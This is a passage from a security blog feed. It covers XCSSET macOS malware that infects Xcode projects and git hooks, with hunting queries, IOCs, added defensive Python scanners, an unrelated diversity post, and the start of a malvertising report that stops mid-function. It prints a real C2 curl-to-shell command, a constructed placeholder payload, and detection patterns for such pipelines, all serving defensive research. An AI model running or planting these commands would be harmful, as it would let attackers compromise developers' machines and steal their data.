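    except (OSError, plistlib.InvalidFileException):
        return None


def inspect_bundle(bundle):
    """Return the reasons this bundle matches the masquerading pattern (empty if none)."""
    name = os.path.basename(bundle)
    if name not in IMPERSONATED_NAMES:
        return []  # ordinary third-party apps are out of scope for this check
    reasons = [f"{name} found outside /System/Applications"]
    info = read_info_plist(bundle) or {}
    if info.get("LSUIElement") in (True, 1, "1"):
        reasons.append("LSUIElement set: runs with no Dock icon or menu bar")
    if os.path.isdir(os.path.join(bundle, "Notes")):
        reasons.append("contains a Notes directory (staging area for stolen notes)")
    return reasons


def audit_applications(dirs=DEFAULT_DIRS):
    """Scan each directory for .app bundles and return a list of findings."""
    findings = []
    for directory in dirs:
        if not os.path.isdir(directory):
            continue
        for entry in sorted(os.listdir(directory)):
            bundle = os.path.join(directory, entry)
            if entry.endswith(".app") and os.path.isdir(bundle):
                reasons = inspect_bundle(bundle)
                if reasons:
                    findings.append({"bundle": bundle, "reasons": reasons})
    return findings


def make_bundle(root, name, ui_element, with_notes=False):
    """Constructed sample bundle for the demo only (not a real application)."""
    bundle = os.path.join(root, name)
    os.makedirs(os.path.join(bundle, "Contents"), exist_ok=True)
    info = {"CFBundleDisplayName": name[:-4], "CFBundleExecutable": name[:-4]}
    if ui_element:
        info["LSUIElement"] = True
    with open(os.path.join(bundle, "Contents", "Info.plist"), "wb") as fh:
        plistlib.dump(info, fh)
    if with_notes:
        os.makedirs(os.path.join(bundle, "Notes"), exist_ok=True)
    return bundle


def demo():
    """Audit a temporary folder holding two look-alike bundles and one benign helper app."""
    root = tempfile.mkdtemp(prefix="app-audit-")
    make_bundle(root, "Reminders.app", ui_element=True, with_notes=True)
    make_bundle(root, "Terminal.app", ui_element=True)
    make_bundle(root, "SomeEditor.app", ui_element=True)  # benign: LSUIElement alone is not flagged
    return audit_applications((root,))
```

Run audit_applications() with no arguments on a Mac to check the default locations.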

dfhsebxzod (Infects Xcode projects)

This module, which is launched by the launcher module vectfd_xhh, is designed to infect Xcode projects located on the target device. It initially retrieves the user’s home directory and subsequently invokes two distinct functions to search and process files.

Figure 20. Searching Xcode projects in a target folder

The first function searches for xcodeproj directories, excluding certain specified directories. The other function downloads a binary, presumed to be a 7-Zip binary, from the C2 server. It then searches the HOME folder, excluding specified directories, for .zip files. For each .zip file it finds, it scans the archive listing for “xcodeproj.” If that entry is present, the module contains logic to extract the project files, modify them, and update the archive with the modified files.

For both functions, each directory or file match triggers a subsequent function that searches for a .pbxproj file within the given directory. This new function then randomly selects one of three infection methods: RULE, TARGET, or FORCED_STRATEGY. The infection method determines how the payload will be placed and referenced in the .pbxproj file.

One infection technique not mentioned in previously published research is part of the FORCED_STRATEGY method. This technique places the generated payload in the TARGET_DEVICE_FAMILY variable under Build Settings.

Figure 21. FORCED_STRATEGY method of infecting a pbxproj file

Next, it adds a PBXShellScriptBuildPhase in the .pbxproj file where the payload will be present in the shellScript key.

The payload is generated in a separate function that first defines three specific domains and randomly selects one of them. It uses either the xxd or the Base64 encoding method, also chosen at random.

Figure 22. Function to generate a payload that infects a pbxproj file

This method also selects a random value between 2 and 5 to determine the number of iterations for encoding/decoding. The first payload includes an encoded curl request to the specified C2 server, the output of which is piped to the shell for execution. The final payload, which consists of the above encoded data and a decoding string, is also piped to shell for execution.

jez (Establishes persistence through Git commits)

This module attempts to establish persistence by incorporating its payload into the pre-commit hooks within the .git directory of projects located on the device.

Figure 23. Infection of hooks/pre-commit file in Git’s directory

It searches for .git folders in the user’s home directory and its sub-directories using the find command. It searches up to six levels of sub-directories and excludes those named Movies, Library, Music, and Pictures. For each .git directory found, the module checks for the presence of the hooks/pre-commit file. If it finds the file, it removes any existing payload content and appends the newly created payload.

If the module doesn’t find the pre-commit file, it creates the file and writes the payload within it. The process for generating the payload is similar to the zshrc and Dock persistence techniques discussed in the previous sections of this blog. This persistence method ensures the execution of the payload upon each commit action in the project.
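The following Python scanner is added here and is not part of the Microsoft write-up. It covers both the .pbxproj infection above (payload in a PBXShellScriptBuildPhase shellScript or in TARGET_DEVICE_FAMILY) and the pre-commit hook persistence: it peels the nested xxd/base64 layers off a one-liner and flags a decoded curl fetch piped to a shell. The function names, the regexes and the constructed sample with the placeholder domain c2.example.invalid are assumptions.

```python
import base64
import binascii
import re

# Long runs of base64/hex characters are candidate encoded blobs.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/=]{16,}")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Decoder pipelines used by the injected one-liners (same strings as the hunting queries).
DECODER_RE = re.compile(r"xxd -p -r|base64 (?:-d|-D|--decode)")
# A decoded stage that downloads with curl and hands the output to a shell.
FETCH_EXEC_RE = re.compile(r"\bcurl\b[^\n|]*\|\s*(?:sh|bash|zsh)\b")
# Injection points in .pbxproj: the shellScript of a PBXShellScriptBuildPhase and the
# TARGET_DEVICE_FAMILY build setting; both are quoted OpenStep-style strings.
PBX_VALUE_RE = re.compile(r'(shellScript|TARGET_DEVICE_FAMILY)\s*=\s*"((?:[^"\\]|\\.)*)"')


def unescape_pbx(value):
    """Undo the escapes Xcode uses inside quoted .pbxproj strings."""
    return value.replace('\\"', '"').replace("\\n", "\n").replace("\\\\", "\\")


def decode_once(token):
    """Decode one layer: hex first (what xxd -p -r reads), then base64 (base64 -d)."""
    if len(token) % 2 == 0 and HEX_RE.match(token):
        raw = bytes.fromhex(token)
    else:
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # Shell text is printable; bytes decoded from an ordinary long identifier usually are not.
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def peel_layers(script, max_layers=10):
    """Strip nested encoding layers; returns (innermost_text, layer_count)."""
    text, layers = script, 0
    while layers < max_layers:
        tokens = TOKEN_RE.findall(text)
        decoded = decode_once(max(tokens, key=len)) if tokens else None
        if decoded is None:
            break
        text, layers = decoded, layers + 1
    return text, layers


def analyze_script(script):
    """Classify one shell snippet; returns the decoded stage plus the reasons it was flagged."""
    decoded, layers = peel_layers(script)
    reasons = []
    has_decoder = DECODER_RE.search(script) is not None
    if has_decoder:
        reasons.append("shell decoder pipeline (xxd -p -r / base64 -d)")
    if layers >= 2:
        reasons.append(f"{layers} nested encoding layers")
    fetch_exec = FETCH_EXEC_RE.search(decoded) is not None
    if fetch_exec:
        reasons.append("decoded stage fetches a URL with curl and pipes it to a shell")
    suspicious = fetch_exec or (has_decoder and layers >= 2)
    return {"layers": layers, "decoded": decoded, "reasons": reasons, "suspicious": suspicious}


def scan_pbxproj(text):
    """Findings for injected shellScript / TARGET_DEVICE_FAMILY values in a .pbxproj."""
    findings = []
    for key, raw_value in PBX_VALUE_RE.findall(text):
        result = analyze_script(unescape_pbx(raw_value))
        if result["suspicious"]:
            findings.append({"key": key, **result})
    return findings


def scan_pre_commit(hook_text):
    """Analysis of a .git/hooks/pre-commit file if it looks injected, else None."""
    result = analyze_script(hook_text)
    return result if result["suspicious"] else None


def build_constructed_sample(inner="curl -fskL https://c2.example.invalid/a | sh"):
    """Constructed test input only: a placeholder command wrapped in one hex layer and one
    base64 layer, in the echo-decode-pipe shape the write-up describes."""
    stage1 = f"echo {inner.encode().hex()} | xxd -p -r | sh"
    return f"echo {base64.b64encode(stage1.encode()).decode()} | base64 -d | sh"


def demo():
    """Scan a constructed .pbxproj fragment and a constructed pre-commit hook."""
    payload = build_constructed_sample()
    pbxproj = (
        "\t\t\tshellPath = /bin/sh;\n"
        f'\t\t\tshellScript = "{payload}\\n";\n'
        '\t\t\tTARGET_DEVICE_FAMILY = "1,2";\n'
    )
    hook = "#!/bin/sh\n" + payload + "\n"
    return scan_pbxproj(pbxproj), scan_pre_commit(hook)
```

To use it on a real project, pass the text of project.pbxproj to scan_pbxproj() and the text of .git/hooks/pre-commit to scan_pre_commit().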

File/Data exfiltration modules assessed to be in development

uhsoxtfd_vostfd (Directory uploader)

This module is designed to exfiltrate files from a specified target folder. It appears to be in the development phase as of this writing because the specified target folder is currently set to ~/Desktop/test.

This module first verifies the existence of the target folder and exits if it can’t find the said folder. Otherwise, it lists the folder’s contents to test access permissions. If access is denied, the module runs a recursive loop to reset the TCC database for directories such as Desktop, Downloads, and Documents.

Once folder access is granted, the module archives the folder, excluding certain files such as links, patterns listed in the exclusion list, and files exceeding a specified size. It then uploads the created archive to a C2 server. Once the exfiltration is complete, the module deletes the archive.

fpfb (Directory listing)

This module runs a predefined command and uploads the result of the said command back to the C2 server. Currently, the command is set to “ls -la ~/Desktop”, which lists the files and directories in the user’s Desktop folder.

vectfd (Specific files exfiltration)

This module retrieves files that match the pattern defined in the INAME_QUERY variable within the user’s home directory. Currently, it searches for files with the pattern “*test.txt,” which indicates that the module might be under development. It also excludes files located in certain directories and files that exceed its size restrictions. The module then creates an archive of the files it retrieves, sends the archive to a C2 server, and deletes the archive.

Mitigation and protection guidance

Defenders can take the following mitigation steps to defend against this threat:

  • Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
  • Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
  • Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
  • Use Microsoft Defender for Endpoint on Mac, which detects, stops, and quarantines the malware discussed in this blog.

Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:

  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
  • Turn on network protection to block connections to malicious domains and IP addresses.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

  • Trojan:MacOS/XCSSET.SC
  • Trojan:MacOS/XCSSET.SE
  • Trojan:MacOS/XCSSET.ST

Defender Antivirus detects multiple sub-modules of this threat as the following:

  • Trojan:MacOS/XCCSET.SE
  • Trojan:MacOS/XCCSET.SF
  • Trojan:MacOS/XCCSET.SG
  • Trojan:MacOS/XCCSET.SI
  • Trojan:MacOS/XCCSET.SJ

Defender Antivirus also detects the following specific modules of this threat:

  • Trojan:MacOS/XCCSET.SK – dfhsebxzod
  • Trojan:MacOS/XCCSET.SH – fpzfcieoci
  • Trojan:MacOS/XCCSET.SD – hfdieiz

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Possible XCSSET activity

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

  • Suspicious script launched
  • System information discovery
  • Network connection by osascript
  • Possible content exfiltration
  • Suspicious file or content ingress

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Suspicious commands while building an Xcode project

Search for suspicious commands related to this threat when an Xcode project is being built.

DeviceProcessEvents
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")
| where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"

Suspicious payload patterns

Search for suspicious payload patterns related to this threat.

DeviceProcessEvents
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

Search for command lines making first contact to C2 server or for command lines stopping Xcode, Terminal, or Finder applications:

union DeviceFileEvents, DeviceProcessEvents
| where Timestamp >= ago(90d)
| where ProcessCommandLine contains 'curl -fskL -d "https://bulknames.ru/a" | sh >/dev/null 2>&1 &' or ProcessCommandLine has "ps aux | grep -E '/Applications/(SimulatorTrampoline|Terminal|Finder).app' | grep -v grep | awk '{print $2}' | xargs kill -9 &/dev/null || true"

Check for communications with network indicators of compromise (IOCs):

let c2cdomains = dynamic(["bulknames.ru", "castlenet.ru", "chaoping.ru", "devapple.ru", "gigacells.ru", "gizmodoc.ru", "trixmate.ru", "itoyads.ru", "rigglejoy.ru", "rutornet.ru", "sigmate.ru", "vivatads.ru", "figmasol.ru"]);
DeviceNetworkEvents
| where RemoteUrl in (c2cdomains)
| project TimeGenerated, DeviceId, DeviceName, Protocol, LocalIP, LocalIPType, LocalPort, RemoteIP, RemoteIPType, RemotePort, RemoteUrl

Check for infected file or script IOCs:

let selectedTimestamp = datetime(2025-01-01T00:00:00.0000000Z);
// Runs the search for 90 days from January 1st; change selectedTimestamp above or the 90d window accordingly.
let FileSHA256 = dynamic(["d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f", "56670f51f94080f1ae45f2a433767f210f290835bf582e1a2e1876f1028832de", "f67e2a27f0d1a4667b065ab05f884ff881eb7627e9d458f97f2204647b339c6e", "25d226d5cb0c74ed5b1b85f12d53a4c2de2147ff464b2a35db03987015b11e24", "c2a7970216576a6b8f74528ffcfa51aa2b72b7f3e4237d97715b1b5ba80b25ca", "8cec3c106659709017bb253becf68296c7bf13e76fa92b4450c281003d225645", "ea90c72e67f1c9a9231732119576a7dcb29471f7da428866187d4326e78097f2", "ff83f53a383ba3f1d6b002006adf16a7f0b3263185d56cb70104889874d67c5d", "cc37a01d3351b3c166f04aec6f52849e909b0b9c8d55095d730c660691b1ba66"]);
search in (AlertEvidence, BehaviorEntities, CommonSecurityLog, DeviceBaselineComplianceProfiles, DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceLogonEvents, DeviceNetworkEvents, DeviceProcessEvents, DeviceRegistryEvents, DeviceFileCertificateInfo, DynamicEventCollection, EmailAttachmentInfo, OfficeActivity, SecurityEvent, ThreatIntelligenceIndicator)
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
and (SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))

Indicators of compromise

Indicator | Type | Description
bulknames[.]ru | Domain | C2 server
castlenet[.]ru | Domain | C2 server
chaoping[.]ru | Domain | C2 server
devapple[.]ru | Domain | C2 server
gigacells[.]ru | Domain | C2 server
gizmodoc[.]ru | Domain | C2 server
trixmate[.]ru | Domain | C2 server
itoyads[.]ru | Domain | C2 server
rigglejoy[.]ru | Domain | C2 server
rutornet[.]ru | Domain | C2 server
sigmate[.]ru | Domain | C2 server
vivatads[.]ru | Domain | C2 server
figmasol[.]ru | Domain | C2 server
~/Library/Caches/com.apple.finder | File path | A fake Launchpad application is created in this directory
/Applications/SimulatorTrampoline.app | File path | Launcher application that runs additional modules found under the finderModules list
/Applications/Reminders.app | File path | Fake Reminders application
/Applications/Reminders.app/Notes/ | File path | Directory where the malware stores the stolen notes from the Notes application
/Applications/Terminal.app | File path | Launcher application that runs additional modules found under the finderModules list
/Applications/Finder.app | File path | Launcher application that runs additional modules found under the finderModules list
d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f | SHA-256 | tmp/b or looz (fourth-stage payload)
56670f51f94080f1ae45f2a433767f210f290835bf582e1a2e1876f1028832de | SHA-256 | /tmp/.n (JavaScript payload)
f67e2a27f0d1a4667b065ab05f884ff881eb7627e9d458f97f2204647b339c6e | SHA-256 | dfhsebxzod module (infects Xcode projects)
25d226d5cb0c74ed5b1b85f12d53a4c2de2147ff464b2a35db03987015b11e24 | SHA-256 | jez module (establishes persistence through Git commits)
c2a7970216576a6b8f74528ffcfa51aa2b72b7f3e4237d97715b1b5ba80b25ca | SHA-256 | uhsoxtfd_vostfd module (directory uploader)
8cec3c106659709017bb253becf68296c7bf13e76fa92b4450c281003d225645 | SHA-256 | fpfb module (directory listing)
ea90c72e67f1c9a9231732119576a7dcb29471f7da428866187d4326e78097f2 | SHA-256 | vectfd module (specific files exfiltration)
ff83f53a383ba3f1d6b002006adf16a7f0b3263185d56cb70104889874d67c5d | SHA-256 | p (Dock persistence payload)
cc37a01d3351b3c166f04aec6f52849e909b0b9c8d55095d730c660691b1ba66 | SHA-256 | .zshrc_aliases file

MITRE ATT&CK techniques observed

Technique ID | Technique name
T1195.001 | Supply Chain Compromise: Compromise Software Dependencies and Development Tools
T1059.002 | Command and Scripting Interpreter: AppleScript
T1059.007 | Command and Scripting Interpreter: JavaScript
T1059.004 | Command and Scripting Interpreter: Unix Shell
T1546.004 | Event Triggered Execution: Unix Shell Configuration Modification
T1560 | Archive Collected Data
T1005 | Data from Local System
T1041 | Exfiltration Over C2 Channel
T1083 | File and Directory Discovery
T1222.002 | File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
T1564.001 | Hide Artifacts: Hidden Files and Directories
T1105 | Ingress Tool Transfer
T1036.005 | Masquerading: Match Legitimate Name or Location
T1647 | Plist File Modification
T1518 | Software Discovery
T1082 | System Information Discovery
T1614.001 | System Location Discovery: System Language Discovery
T1548.006 | Abuse Elevation Control Mechanism: TCC Manipulation
T1140 | Deobfuscate/Decode Files or Information
T1564.003 | Hide Artifacts: Hidden Window
T1070.004 | Indicator Removal: File Deletion
T1027.004 | Obfuscated Files or Information: Compile After Delivery
T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File
T1217 | Browser Information Discovery
T1518.001 | Software Discovery: Security Software Discovery
T1033 | System Owner/User Discovery

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects appeared first on Microsoft Security Blog.

Categories: Microsoft

Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before

Microsoft Malware Protection Center - Thu, 03/06/2025 - 4:00pm

This Women’s History Month serves as a crucial moment for us to lead and continue to pave the way for a more inclusive future. I am truly honored to support my amazing women colleagues who continue to excel in their careers and am grateful to have so many allies who have extended their hands to help guide and shape me to the person I am today.  

Just last week I was in Tokyo for the Japan Security Forum, where Miki Tsusaka, the President of Microsoft Japan and I had a great conversation during a CyberWomen Asia fireside chat about the importance of women in cybersecurity. Following the chat was a panel discussion with Tsutaki-san, Security leader at Yamaha Motor Corporation and Debbie Furtado, one of our bright Principal group engineering managers. The event highlighted our different perspectives and talents which are invaluable to drive innovation and progress across various industries. I am proud to be a part of Microsoft Security, which is focused on building and nurturing an inclusive cybersecurity workforce and curating careers, tools, and resources that work for everyone. We recognize that this promotes business growth, strengthens global defenses, and enhances AI safety. 

According to the World Economic Forum, gender equality in entrepreneurship drives economic growth and innovation.1 McKinsey and Company has also observed that closing the gender gap in employment and entrepreneurship could increase global GDP by 20%, and that organizations with 30% or more women on executive teams are 27% more likely to achieve higher profitability.2  

For a better future we need everyone on the journey, and this is particularly significant in cybersecurity, where we face a critical shortage of talent and where cyberthreat actors come from diverse backgrounds.

Addressing the skills gap in cybersecurity and AI

There is a significant talent gap in cybersecurity. The 2024 ISC2 Cybersecurity Workforce Study reports a global shortage of 4.7 million skilled workers.3 This worker shortage has been a significant challenge the past 12 months and is expected to continue for the next two years. To address this growing concern, we must embrace a wide range of perspectives and backgrounds to foster innovation and find more effective solutions to these challenges.   

By incorporating individuals with varied perspectives, experiences, and approaches into the cybersecurity workforce, we can improve problem-solving capabilities and strengthen strategic defenses.

Cybercriminals come from various cultures and backgrounds, bringing different perspectives. Security professionals with varied backgrounds and perspectives can provide creative approaches and unique insights to counter these cyberthreats. Likewise, for AI, having different backgrounds and perspectives helps with AI safety and bias.

Continue to deepen expertise and invite different perspectives

While progress has been made in creating opportunities for women in cybersecurity, significant work remains to remove entry barriers. It is essential to continue our efforts to improve representation in cybersecurity by creating new pathways and gaining support from more allies. I wholeheartedly encourage you to actively contribute to this objective through the many organizations and programs available and by doing the following: 

  • Share the accomplishments of meaningful role models with a wide range of experiences and perspectives. 
  • Adjust job requirements to remove potential biases. 
  • Offer inclusive training that encourages professionals, particularly those in their early careers, and encourage them to advance their skills in cybersecurity. 
  • Volunteer for educational programs that include cybersecurity and AI training. 
  • Reach out to community groups that advocate for mentorship opportunities. 
  • Act as an ally and create opportunities for those interested in cybersecurity careers, such as by encouraging them to participate and speak up and introducing them to peers. 

Security should be for all and we are all in this together. Together, we can enhance the global security workforce and contribute to a promising future.  

Register for our upcoming panel “Harnessing Diversity – Strengthening the Cybersecurity Workforce in the Age of AI” and visit Microsoft’s cybersecurity awareness page for resources and training provided by Microsoft security experts, enabling everyone in your organization to become a cyber defender. Let us all acknowledge the importance of diversity in cybersecurity and its critical role in safeguarding our future and shaping a history we can be proud of. 

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1. Advancing gender parity in entrepreneurship: strategies for a more equitable future, World Economic Forum, January 20, 2025.

2. Diversity matters even more: The case for holistic impact, McKinsey and Company, December 5, 2023.

3. 2024 ISC2 Cybersecurity Workforce Study, ISC2, October 31, 2024.

The post Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before appeared first on Microsoft Security Blog.

Categories: Microsoft

Malvertising campaign leads to info stealers hosted on GitHub

Microsoft Malware Protection Center - Thu, 03/06/2025 - 12:00pm

In early December 2024, Microsoft Threat Intelligence detected a large-scale malvertising campaign that impacted nearly one million devices globally in an opportunistic attack to steal information. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading to an intermediary website where the user was then redirected to GitHub and two other platforms. The campaign impacted a wide range of organizations and industries, including both consumer and enterprise devices, highlighting the indiscriminate nature of the attack.


GitHub was the primary platform used in the delivery of the initial access payloads and is referenced throughout this blog post; however, Microsoft Threat Intelligence also observed one payload hosted on Discord and another hosted on Dropbox.

The GitHub repositories, which were taken down, stored malware used to deploy additional malicious files and scripts. Once the initial malware from GitHub gained a foothold on the device, the additional files deployed had a modular and multi-stage approach to payload delivery, execution, and persistence. The files were used to collect system information and to set up further malware and scripts to exfiltrate documents and data from the compromised host. This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads.

In this blog, we provide our analysis of this large-scale malvertising campaign, detailing our findings regarding the redirection chain and various payloads used across the multi-stage attack chain. We further provide recommendations for mitigating the impact of this threat, detection details, indicators of compromise (IOCs), and hunting guidance to locate related activity. By sharing this research, we aim to raise awareness about the tactics, techniques, and procedures (TTPs) used in this widespread activity so organizations can better prepare and implement effective mitigation strategies to protect their systems and data.

We would like to thank the GitHub security team for their prompt response and collaboration in taking down the malicious repositories.

GitHub activity and redirection chain

Since at least early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories. The users were redirected to GitHub through a series of other redirections. Analysis of the redirector chain determined the attack likely originated from illegal streaming websites where users can watch pirated videos. The streaming websites embedded malvertising redirectors within movie frames to generate pay-per-view or pay-per-click revenue from malvertising platforms. These redirectors subsequently routed traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirected to GitHub.

Multiple stages of malware were deployed in this campaign, as listed below; the activity in the later stages depended on the payload dropped during the second stage.

  • The first-stage payload that was hosted on GitHub served as the dropper for the next stage of payloads.
  • The second-stage files were used to conduct system discovery and to exfiltrate system information that was Base64-encoded into the URL and sent over HTTP to an IP address. The information collected included data on memory size, graphic details, screen resolution, operating system (OS), and user paths.
  • Various third-stage payloads were deployed depending on the second-stage payload. In general, the third-stage payload conducted additional malicious activities such as command and control (C2) to download additional files and to exfiltrate data, as well as defense evasion techniques.

The full redirect chain was composed of four to five layers. Microsoft researchers determined malvertising redirectors were contained within an iframe on illegal streaming websites.

Figure 1. Code from website of streaming video and iframe showing malvertising redirector URL

There were several redirections that occurred before arriving at the malicious content stored on GitHub.

Figure 2. Redirection chain from pirate streaming website to malware files on GitHub

Attack chain

Once the redirection to GitHub occurred, the malware hosted on GitHub established the initial foothold on the user’s device and functioned as a dropper for additional payload stages and for running malicious code. The additional payloads included information stealers that collect system and browser information from the compromised device, most of them either Lumma stealer or an updated version of Doenerium. Depending on the initial payload, NetSupport, a remote monitoring and management (RMM) tool, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors used living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and for exfiltration of user data and browser credentials.

After the initial foothold was gained, the activity led to a modular and multi-stage approach to payload delivery, execution, and persistence. Each stage dropped another payload with a different function, as outlined below. Actions conducted across these stages include system discovery (memory, GPU, OS, signed-in users, and others), opening browser credential files, Data Protection API (DPAPI) crypt data calls, and other functions such as obfuscated script execution and named pipe creations to conduct data exfiltration. Persistence was achieved through modification of the registry run keys and the addition of a shortcut file to the Windows Startup folder.

Several stages of malicious activity to conduct deployment of additional malware, collections, and exfiltration of data to a C2 were observed. While not every single initial payload followed these exact steps, this is an overall view of what occurred across most incidents analyzed:

Figure 3. General depiction of the four stages

First-stage payload: Establishing a foothold on the host

During the first stage, a payload is dropped onto the user’s device from the binary hosted on GitHub, establishing a foothold on that device. As of mid-January 2025, the first-stage payloads discovered were digitally signed with a newly created certificate. A total of twelve different certificates were identified, all of which have been revoked.

Most of these initial payloads dropped the following legitimate files to leverage their functionality. These files were either leveraged by the first-stage payload or by later-stage payloads, depending on the actions being conducted.

File name | Function
app-64.7z | This is a compressed archive that stores the second-stage payload and additional dropped files.
app.asar | This is an archive file specific to Electron applications, which are directly installed programs.
d3dcompiler_47.dll | This file is often included in DirectX redistributables, which are commonly bundled with Microsoft installers for games and graphics applications.
elevate.exe | This file is used by various installers and scripts to run processes with elevated privileges, not specific to Microsoft.
ffmpeg.dll | This file is associated with FFmpeg, a popular multimedia framework used to handle video, audio, and other multimedia files and streams.
libEGL.dll | This file is part of the ANGLE project, which is often found in applications that use OpenGL Embedded Systems (ES), including some web browsers and games.
libEGLESv2.dll | This file is part of the ANGLE project, which is often found in applications that use OpenGL ES, including some web browsers and games.
LICENSES.chromium.html | This file could contain information about the system or browser.
nsis7z.dll | This file is associated with the plugins for the Nullsoft Scriptable Install System (NSIS), which is used to create installers for various software.
StdUtils.dll | This file is associated with the plugins for the NSIS.
System.dll | This file is part of the .NET Framework assembly, typically included in Microsoft installers for applications that rely on the .NET Framework.
vk_swiftshader.dll | This file is associated with SwiftShader, which is used in applications that need a CPU-based implementation of the Vulkan API.
vulkan-1.dll | This file is associated with applications that use the Vulkan Graphics API, such as games and graphics software.

Depending on the first-stage payload that was initially established on the compromised device, Microsoft observed different second-stage payloads and several different methods for delivering these payloads to the device.

Second-stage payload: System discovery, collection, and exfiltration

The main purpose of the second-stage payload is to conduct system discovery and collect that data for exfiltration to the C2. The system information collected includes data such as memory size, graphic card details, screen resolution, operating system, user paths, and a reference to the second-stage payload’s file name.

This was accomplished by querying the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName for the Windows OS version and running commands, such as the echo command, to gather the device’s name (%COMPUTERNAME%) and domain name (%USERDOMAIN%).

System data collected by the second-stage payload is Base64-encoded and exfiltrated as a query parameter to an IP address.
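
To make the exfiltration format concrete from the defender's side, here is an added example (not code from the report or from Microsoft) that scans proxy log lines for query parameters that decode from Base64 into system-information text of the kind described above. The log line layout, the field names in the constructed system-information string, and the IP addresses are all assumptions made for the example; the report does not reproduce the exact payload format.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample data (not from the report): a system-info string of the kind the
# second stage collects, plus a benign Base64 parameter a web app might legitimately send.
CONSTRUCTED_SYSINFO = ("COMPUTERNAME=DESKTOP-AB12;USERDOMAIN=CORP;OS=Windows 10;"
                       "MEMORY=16GB;GPU=NVIDIA GeForce;RESOLUTION=1920x1080")
CONSTRUCTED_BENIGN = '{"page":1,"sort":"date","filter":"open"}'

# Constructed proxy log lines: "<timestamp> <client> <method> <url>"
SAMPLE_PROXY_LOG = "\n".join([
    "2025-01-15T10:01:02Z 10.0.0.12 GET https://www.example.com/index.html?q=search",
    "2025-01-15T10:01:09Z 10.0.0.12 GET http://203.0.113.5/?data="
    + base64.b64encode(CONSTRUCTED_SYSINFO.encode()).decode(),
    "2025-01-15T10:01:15Z 10.0.0.12 GET https://cdn.example.net/api?state="
    + base64.b64encode(CONSTRUCTED_BENIGN.encode()).decode(),
])

IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
# Field names the report says the second stage collects; matched case-insensitively.
SYSINFO_MARKERS = ("computername", "userdomain", "windows", "gpu", "resolution", "memory")


def try_decode_base64(value):
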